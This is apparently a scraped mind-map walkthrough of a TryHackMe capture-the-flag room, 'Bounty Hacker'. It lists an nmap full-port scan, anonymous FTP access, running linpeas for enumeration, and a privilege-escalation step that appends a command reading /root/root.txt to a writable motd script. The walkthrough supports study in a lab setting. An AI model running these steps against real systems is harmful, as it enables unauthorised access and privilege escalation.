Please enable JavaScript.
Coggle requires JavaScript to display documents.
Bounty Hacker, nmap -vv -T4 -A -p- -oA "$IP-output" $IP, -vv…
-
-
-vv verbose output
-T4 level 4 timing
-A device information
-p- scans all ports
-oA outputs in all formats
-
ftp $IP
Name ($IP, ...): anonymous
-
-
-
-
-
-
-
attackbox_~:$ scp linpeas.sh lin@$IP:~/Desktop/lin@bountyhacker:~$ chmod +x linpeas.sh
./linpeas.sh | tee linpeas.output
attackbox~:$ ssh -l lin $IP
lin@bountyhacker:~$ echo "cat /root/root.txt" >> /etc/update-motd.d/00-header
lin@bountyhacker:~$ exit
attackbox~:$ ssh -l lin $IPWelcome to Ubuntu ...
THM{......_......}
-